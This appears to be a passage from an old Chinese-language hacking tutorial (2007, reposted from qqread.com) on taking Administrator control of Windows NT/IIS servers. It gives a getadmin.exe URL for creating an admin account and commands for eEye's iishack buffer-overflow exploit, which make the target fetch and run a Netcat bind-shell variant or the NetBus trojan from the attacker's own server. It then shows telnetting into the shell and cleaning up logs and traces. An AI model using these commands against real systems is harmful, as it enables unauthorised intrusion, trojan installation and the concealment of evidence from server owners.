操作Windows NT的Administrator权限

来源：作者：出处：巧巧读书 2007-10-09 进入讨论组

　　或者

http://www.xxx.com/scripts/tools/getadmin.exe?china

　　你再用China的帐号登陆，就可以有最大的权限了，也可以用上面的cmd.exe的方法直接修改如果没有cmd.exe，也可以自己传一个上去到scripts/tools或者cgi-bin目录。

　　第三个方法、用netcat和iishack

　　如果你熟悉使用Netcat这个工具，你就知道，netcat可以利用NT的弱点在其上绑定端口，下面用eEye的工具已经介绍过，如果你熟悉Netcat，成功的可能性会更大。

　　IIS的ISAPI的毛病(*.HTR)

　　我们再来看看eEye最近这两天发现的一个关于NT/IIS的问题和工具。在IIS的/Inetsrv目录下，有个DLL文件叫ism.dll，这个模块

　　在web运行的时候就被加载到较高的内存地址，并且导致了零字节问题到处出现IIShack.asm，利用这个毛病，eEye写了两个程序：

iishack.exe
ncx99.exe

　　为达目的你必须自己有一个web server，把ncx99.exe和netbus木马传到这个web server的目录下，比如你的web server是：

www.mysvr.com? 而对方的IIS server是www.xxx.com

　　则：

iishack www.xxx.com 80 www.mysvr.com/ncx99.exe?? (注意，不要加http://字符!)

　　上述命令输入后这时你应该可以看到

------(IIS 4.0 remote buffer overflow exploit)-----------------
(c) dark spyrit -- barns@eeye.com.
http://www.eEye.com
[usage: iishack ]
eg - iishack www.xxx.com 80 www.mysvr.com/thetrojan.exe
do not include 'http://' before hosts!
---------------------------------------------------------------
Data sent!

　　然后，再把Netbus等特洛伊木马传到对方机器上去：

iishack www.example.com 80 www.myserver.com/netbus.exe

　　ncx99.exe

　　实际上是有名的Netcat的变种，它把对方server的cmd.exe绑定到Telnet服务。 ncx.exe

　　这是较早的版本，是把端口绑到80的，由于80端口跑web服务，端口已经被使用。所以可能不一定有效。然后，用Telnet到对方的99或80端口：

Telnet www.xxx.com 99

　　结果是这样：

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:>[You have full access to the system, happy browsing :)]
C:>[Add a scheduled task to restart inetinfo in X minutes]
C:>[Add a scheduled task to delete ncx.exe in X-1 minutes]
C:>[Clean up any trace or logs we might have left behind.]

来自:http://www.qqread.com/winnt/w351192.html